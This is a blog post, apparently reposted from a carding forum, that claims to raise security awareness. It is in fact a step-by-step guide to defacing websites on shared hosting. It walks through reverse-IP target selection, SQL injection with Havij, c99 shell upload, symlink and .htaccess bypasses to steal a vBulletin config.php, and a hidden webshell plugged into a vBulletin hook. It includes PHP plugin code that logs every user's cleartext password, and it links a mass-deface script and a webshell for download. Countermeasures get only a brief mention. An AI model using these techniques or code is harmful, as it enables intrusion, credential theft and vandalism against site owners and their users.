воскресенье, 13 января 2013 г.

Script-kiddies

I. What are script-kiddies and how do they hack(deface)? 

A script kiddie or skiddie, occasionally skid, script bunny, script kitty, script-running juvenile (SRJ) or similar, is a derogatory term used to describe those who use scripts or programs developed by others to attack computer systems and networks and deface websites. – Wikipedia (http://en.wikipedia.org/wiki/Script_kiddie)
This article explains the various methods through which script-kiddies and black hat wannabes deface websites in 2011. I have aimed at security awareness for site owners, hosting administrators and the public of carder.pro. How did your website get defaced? Keep on reading and you will find out.
This is for educational purposes only. You may re-distribute freely without changing my name or the content.


II. Deface statistics

What is a (website) deface?
A website defacement is an attack on a website that changes the visual appearance of the site or a webpage. These are typically the work of system wannabe black/grey hat hackers, who break into a web server and replace the hosted website with one of their own. – Wikipedia (http://en.wikipedia.org/wiki/Website_defacement). 
After the index page of a website has been replaced with a “deface” there is a growing trend among script-kiddies to submit their deface to


which is the biggest deface archiver (maybe this way their e-penis gets bigger?). Zone-h has provided a great article/analyze of the defacements in 2010 (http://www.zone-h.org/news/id/4737) which I recommend reading. If you want to see statistics through 2011 then you can visit their statistics page(http://www.zone-h.org/stats/ymd). The peak was in 2010 which means that most attacks occurred then but we should not forget that on-going attacks against the business, corporations and others are still ongoing in the background. The big publicity that script-kiddy groups like LulzSec and Anonymous get, is just revealing to some extend how many attacks are happening all the day (with and without defacement).
Overall, why are defacements occurring more and more? Because information is more widely shared, technologies are being developed rapidly and as the security industry continues to grow, there is always someone to exploit whatever new is on the market.


III. The “skid” attack

How does one cycle of “a skid attack” look like?
To begin with, script-kiddies love SQLi (SQL injections) especially when they use automated tools like Havij (http://www.itsecteam.com) to exploit these vulnerabilities. After injecting a security hole with Havij, they get administrator access through the data in the database. A pre-final step would be “raising” a shell and if they have some local kernel exploit for the server they try to get root, if not, start defacing one by one. I am going to discuss the various methods which an attacker such as the “skiddie” can use to deface your website. They are no masters or wizards of security, I am going to prove that to you as well as how lame they really are.

1. Attack types
There are 3 types of reasons for attack – targeted, for “reputation” and fusion between these two. The first one is when you have personal conflicts with the site owner or you don’t like the content and the second one is when you mass-deface websites (feeling more 1337 I guess?). I am going to write about the fusion attack, first we shall target a specific website, after we have defaced it, we will get root status and mass deface. (of course, it will be with example scenario)

2. Finding our target
Let us presume g00d-f0rum.net is our target which content and owner we don’t admire and want to “give him a lesson”.(for this occasion only we are the evil script-kiddie)

2.1 Is it on shared hosting?
To check whether our target is “hackable” we check if there are other domains on this server:
Domain Tools Reverse IP - http://www.domaintools.com/research/reverse-ip/
Yougetsignal Reverse IP - http://www.yougetsignal.com/tools/we...on-web-server/
Webhosting.info Reverse IP - http://whois.webhosting.info/
and many others…
We are going to use the first one since it is the most accurate of all. We go to the URL and input our target domain (g00d-f0rum.net in our case). The results should be something similar:

[IMG]

2.2 Attacking the shared hosting
It doesn’t take much skill to attack the website on the shared hosting. We go to Bing (http://www.bing.com/) and input “ip:TARGETIP” and all of the websites are now listed. How to find our special SQLi security hole? We will add “id=” (or any other dork but this is the most commonly used) so that it is “ip:TARGETIP id=” and we start checking them one by one.

[IMG]

Those in red are what the script-kiddie is most likely to “havij” because of their unique/custom URLs (custom coded php = vulnerable in most cases). We have:
csr.php?sub=dir&show=1&company_?id=33
view_news.php?id=144
pressrelease.php?lang=en&?id=00000.txt

We put the first one into Havij and wait for result… nothing. We input the second one… success! Now that our tool has injected the vulnerability we click “Get Tables” (we choose table like admin_users), “Get Columns” , then we chose columns we want to extract (in our case pass, username,id) and “Get Data”.

[IMG]

Now the script-kiddie must find the administrator/login page, there are various tools (online ones too) to find it for you (google " online admin page finder" or related). Assuming that we have found the page, we login via the credentials we have obtained from the SQLi attack.

[IMG]

We upload a c99 shell and now comes the interesting part…

2.3 Attacking our target
We, as the script-kiddie had set g00d-f0rum.net as our target, remember ? We broke into another website on the same server(we knew that through reverse ip), uploaded a shell(example directory of shell is /home/example/public_html/content_images/c99.php) and now we are going to hack and deface our victim.

2.3.1 Security problems
Once uploaded the c99 shell we might see that the host has denied some functions like phpinfo, system() etc. and safe_mode is switched to ON. These features are put as "security" in place but in the majority of cases, they are easily bypassed. One of the easiest ways is to grab the php.ini of the server and modify it so that no functions are disable and safe_mode shows OFF. You can do that by creating a php file with the following content:


Now save it as info.php (for example) and enter it through your browser. You will see exactly where php.ini is hosted on (/etc/php5/php.ini for example).

2.3.2 Identifying path of the target in the server
On one server there could be hundreds or even thousands of websites so to know in which directory is g00d-f0rum.net we dump the content of /etc/passwd (there is button on c99, r57 etc. shells if you are a newbie). We try looking for the first words of the domain “g00d” and the result comes up directly /home/g00df0r/ is the directory we need. Now g00d-f0rum.net (example!) runs vBulletin 4.1.4 (which is patched against the search UI SQLi but not to other vulnerabilities i have found...) and by Googling we know that the configuration file which holds the MySQL credentials to their database is in /includes/config.php (by default). The vbulletin suite (and most web applications) use MySQL database to store usernames, passwords, posts etc. (so that you understand why we need it). Our idea is to break in and get username, password and hash and try cracking them or even faster, replacing the admin email with our own and requesting password restore.
Note:On such attack timing is important. If he is online and you do this, you might end his session which will raise the level of awarness that something is wrong.
There are various ways to obtain the config.php file, I’m going to list just 2 of them.

2.3.3 Symlink
In computing, a symbolic link (also symlink or soft link) is a special type of file that contains a reference to another file or directory in the form of an absolute or relative path and that affects pathname resolution. – Wikipedia (http://en.wikipedia.org/wiki/Symbolic_link). If you are not familiar with symlink I strongly advise you to read that article.
We are going to issue a “ln –s” on the default configuration file of vBulletin and to put it into our directory, renamed as text file(to be viewable). To do that we do in the c99, r57 or whatever shell “execute command” space:


Our shell is in content_images folder meaning that if we execute (in the same space in the shell as the previous command)


we will get the content of their configuration file (if it exists). Later in the article I will show you how hackers upload a shell through the vBulletin admin panel.

2.3.4 “Protected” config.php via .htaccess
What if our the site owner has placed the following .htaccess in the includes directory?:


We try the same attack as above but we get a 403 Forbidden when we access g00df0r.txt. Hackers have been creative and script-kiddies have obtained their methods and know how to bypass this. We create a directory called “hax” and go to it(via c99 or the shell). We place the following .htaccess in our current directory /home/example/public_html/content_images/hax:


Now we try again the symlink attack but this time in the “hax” folder and we get the configuration file once more. “No security admin” as some of script-kiddies deface pages say.

2.3.4 Symlink drive-thru
Note: You can name the attack however you like, it’s most understandable for me with this name.
The most easiest way of all is the symlink driver-thru attack – it doesn’t require much typing aka script-kiddie friendly. Currently we are in /home/example/public_html/content_images/ and we create a directory called “drive-thru” and enter it.
We issue the following command:


Afterwards we put the following .htaccess file in the “drive-thru” directory.


Let’s presume that we have hacked into example-blablabla.com (/home/example/). We made the symlink in /home/example/public_html/content_images/drive-thru which is http://www.example-blablabla.com/con...es/drive-thru/ . We did a symlink, remember? So it would be example-blablabla.com/content_images/drive-thru/root/ … got the idea? Now it is easy as navigating to the file (it is normal to give 403 Forbidden on /home/g00df0r/) 
example-blablabla.com/content_images/drive-thru/root/home/g00df0r/public_html/includes via our browser and clicking on config.php. But we do get a blank page? Yes, we simply view the source code and the MySQL credentials are there.
Next we connect via some MySQL php connector and tamper the database…

2.4 Getting a shell on our target
Let us presume that we have a vBulletin installation on g00d-f0rum.net . To gain administrator access we crack the hash of the admin or we replace his email with ours and reset the password (as said above). Either way we know the administrator username and password so next thing we have to do is login into the admin panel which by default is g00d-f0rum.net/admincp (or you can try exploring folders via the symlink drive-thru method).
Now the question which comes to the script-kiddie is “How do I upload a shell that isn’t visible (not to tamper templates)?”. Apparently they have leeched from someone a way for this as well – via the webshell 2.0(check download link in reference/interesting). You can scan it at virustotal or wherever you wish, it’s clean.
Open cmd.txt and copy its content WITHOUT the php tags, following this you go to “Plugins and Products” (admincp) -> Add New Plugin and fill in as it says:


You have probably already guessed what to do next but either way I am going to explain. Open up WebShellv2.exe, in WebShell URL put (as in our example) http://www.g00d-f0rum.net/ajax.php and blank out the WebShell Source URL box. 
Note: Why ajax.php? Because of the hook location we have specified ajax_complete.
Next you hit Run WebShell and you have remote shell without anyone knowing because if you do browse to http://www.g00d-f0rum.net/ajax.php you will get a blank page on your screen. Then you just deface.

2.5 “Additional evilness”
What more could have the script-kiddies do? Well, instead of cracking the passwords one by one they could have left a backdoor which will log all users credentials in clear text which would lead to “hacking” and abuse of emails and users themselves.
(Author: DeCrew, http://r00tsecurity.org/forums/topic...g-via-plugins/)
You'll have to add two plugins through the vBulletin admin panel.

First Plugin:


Second Plugin:

Hook Location: login_process
Execution order: 5
Plugin PHP Code:
$lg_username = strtolower($vbulletin->GPC["vb_login_username"]); 
$lg_password = $vbulletin->GPC["vb_login_password"]; 
$lg_file = "./includes/lg.html";
$sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'"); 
while($row = @mysql_fetch_array($sql_query)) 


if(strlen($lg_password) > 1 AND strlen($lg_username) > 1) 

$fp1 = @fopen($lg_file, "a+"); 
@fwrite($fp1, $lg_username . ' : ' . $lg_password." (" . $row["email"] . ")\n");
@fclose($fp1);
$f = @file($lg_file);
$new = array_unique($f);
$fp = @fopen($lg_file, "w");
foreach($new as $values) 

@fputs($fp, $values);
}
@fclose($fp);
}
}

2.6 Rooting and mass deface
If the output of “uname –a” doesn’t match any kernel exploit that skids have in their downloaded from the Internet collection, they simply give up. But if they have the right exploit, they do not hesitate to use it and get root. Then they launch something similar to mass.pl (see download in reference/interesting) and submit the mass deface again to zone-h. In other articles I will show you how to root step-by-step
Note:There is a "Auto-rooter 2011" by r00tworm, I haven't checked it out yet but seems legit, of course, always deal with caution.


III. Counter-measures
Since such attacks as those above have been happening for years now, hosting providers must already apply appropriate security on their shared hosting servers. Many things could be implied such as openbase_dir function in php, suphp, disabling non-used functions in PHP and setting a global php.ini that can’t be overwritten but still they aren't enough.

The counter-measure I would like to show web hosting companies is CloudLinux (http://cloudlinux.com/). There is no need to copy and paste what CloudLinux does, better yet just visit their website.


IV. Reference/Interesting
http://en.wikipedia.org/wiki/Script_kiddie
http://en.wikipedia.org/wiki/Website_defacement
http://www.zone-h.org/news/id/4737
http://www.itsecteam.com
http://www.domaintools.com/research/reverse-ip/
http://www.yougetsignal.com/tools/we...on-web-server/
http://whois.webhosting.info/
http://www.bing.com/
http://en.wikipedia.org/wiki/Symbolic_link
http://r00tsecurity.org/forums/topic...g-via-plugins/
Mass.pl and webshell (password:carder.pro) - http://www.mediafire.com/?086ib535d01q5rf

I would be greatful if you leave feedback! Also can someone translates this to Russian and posts in appropriate section? Thank you in advance.

Комментариев нет:

Отправить комментарий